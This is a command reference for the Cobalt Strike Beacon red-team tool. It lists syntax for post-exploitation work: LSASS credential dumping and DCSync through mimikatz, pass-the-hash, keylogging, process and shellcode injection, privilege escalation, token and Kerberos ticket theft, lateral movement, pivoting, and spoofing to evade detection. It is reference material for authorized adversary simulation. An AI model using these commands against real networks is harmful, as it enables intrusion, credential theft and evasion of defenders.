Cobalt Strike#
Cobalt Strike is software for adversary simulations and red-team operations. The operator drives Beacons over C2, pivots through compromised hosts, and stages credential and lateral movement tradecraft from a single console.
Basic#
cancel [*file*] # cancel a download in progress (wildcards)
cd [directory] # change working directory
clear # clear current taskings
cp [src] [dest] # file copy
download [C:\filePath] # download a file from the Beacon host
downloads # list downloads in progress
execute-assembly # run a local .NET exe as a post-ex job
exit # task the Beacon to exit
help <cmd> # available commands or help for one
inject [pid] <x86|x64> # inject a new Beacon into a process
jobkill [job ID] # kill a job
jobs # list running jobs
keylogger [pid] <x86|x64> # inject a keylogger into a pid / arch
link / unlink [IP address] # link or unlink to a remote Beacon
ls <C:\Path> # list files at path or current folder
net [session|share|localgroup|...] # Beacon-native net commands (no net.exe)
ps # process listing
pwd # working directory of the Beacon
reg_query [x86|x64] [HIVE\path\to\key] # query registry key
reg_query [x86|x64] [HIVE\path\to\key] [value] # query registry value
rm [file|folder] # delete a file or folder
screenshot [pid] <x86|x64> [runtime in seconds]
setenv # set an environment variable
shell [cmd] [arguments] # exec via cmd.exe
sleep [seconds] <jitter/0-99> # set Beacon sleep and jitter (0 = interactive)
upload [/path/to/file] # upload from attacker to Beacon CWD
Spoofing#
argue [command] [fake arguments] # add a command to the fake list
ppid <ID> # set the parent process ID
spawnto <x86|x64> <C:\process\to\spawn.exe> # set the child process spawned
Mimikatz#
mimikatz [module::command] <args> # !module:: elevate to SYSTEM; @module:: force current token
logonpasswords # sekurlsa::logonpasswords (hashes + plaintext from LSASS)
dcsync [DOMAIN.fqdn] [DOMAIN\user] # lsadump::dcsync for a user's hash from a DC
pth [DOMAIN\user] [NTLM hash] # sekurlsa::pth, inject into LSASS (needs local admin)
Desktop VNC#
desktop <pid> <x86|x64> <low|high> # stage VNC, tunnel through Beacon
PowerShell#
powershell-import [/path/to/script.ps1] # import a .ps1, cached in Beacon
powershell [commandlet] [arguments] # local TCP loader, return output
powerpick [commandlet] [arguments] # @tifkin_ Unmanaged PowerShell
psinject [pid] [arch] [commandlet] [arguments] # inject UMPS into a process
Session passing#
dllinject [pid] # reflective DLL into a process
inject [pid] <x86|x64> # new Beacon into a process
shinject [pid] <x86|x64> [/path/to/file.bin] # shellcode injection from file
spawn <x86|x64> [listener] # spawn a Beacon to listener
spawnas [DOMAIN\user] [password] [listener] # spawn as another user
dllload [pid] [c:\path\to\file.dll] # load an on-disk DLL
Privilege escalation#
elevate # list registered exploits
elevate [exploit] [listener] # attempt elevation
runasadmin # list elevators
runasadmin [exploit] [command + args] # run command elevated
runas [DOMAIN\user] [password] [command] # run as another user
spawnas [DOMAIN\user] [password] [listener] # session as another user
getsystem # impersonate SYSTEM token
elevate svc-exe [listener] # service-based SYSTEM
getprivs # enable assigned privileges
Recon#
portscan [targets] [ports] # start port scan job
portscan [targets] arp # ARP-based liveness
portscan [targets] icmp # ICMP-based liveness
net dclist # find domain controller
net view # find targets on the domain
net computers # query computer accounts on DC
net localgroup \\TARGET # groups on remote system
net localgroup \\TARGET group name # members of a group remotely
Tokens#
steal_token [process id] # impersonate from existing process
make_token [DOMAIN\user] [password] # token that passes these creds
getuid # print current token
rev2self # revert to original token
Tickets#
kerberos_ticket_use [/path/to/ticket.kirbi] # inject a Kerberos ticket
kerberos_ticket_purge # purge tickets from session
Lateral movement#
jump # list lateral movement modules
jump [module] [target] [listener] # attempt payload on remote
jump psexec [target] [listener] # service-based EXE artifact
jump psexec64 [target] [listener] # 64-bit service-based EXE
jump psexec_psh [target] [listener] # PowerShell one-liner
jump winrm [target] [listener] # PowerShell via WinRM
jump winrm64 [target] [listener]
remote-exec # list remote exec modules
remote-exec [module] [target] [command + args]
remote-exec psexec [target] [command + args] # via Service Control Manager
remote-exec winrm [target] [command + args] # WinRM (PowerShell)
remote-exec wmi [target] [command + args] # WMI (PowerShell)
Pivoting#
socks [PORT] # SOCKS through Beacon
socks stop # disable SOCKS proxy
browserpivot <pid> <x86|x64> # proxy browser through IE process
rportfwd [bind port] [forward host] [forward port] # reverse port forward
rportfwd stop [bind port] # stop the reverse forward
SSH sessions#
ssh [target] [user] [password] # SSH session from Beacon on Unix
ssh-key [target] [user] [/path/to/key.pem] # SSH session with key
shell [cmd + arguments] # run command on SSH
sudo [password] [cmd + arguments] # attempt sudo
Integrations#
The Elevate Kit is an Aggressor Script that integrates open-source privilege escalation exploits into Cobalt Strike.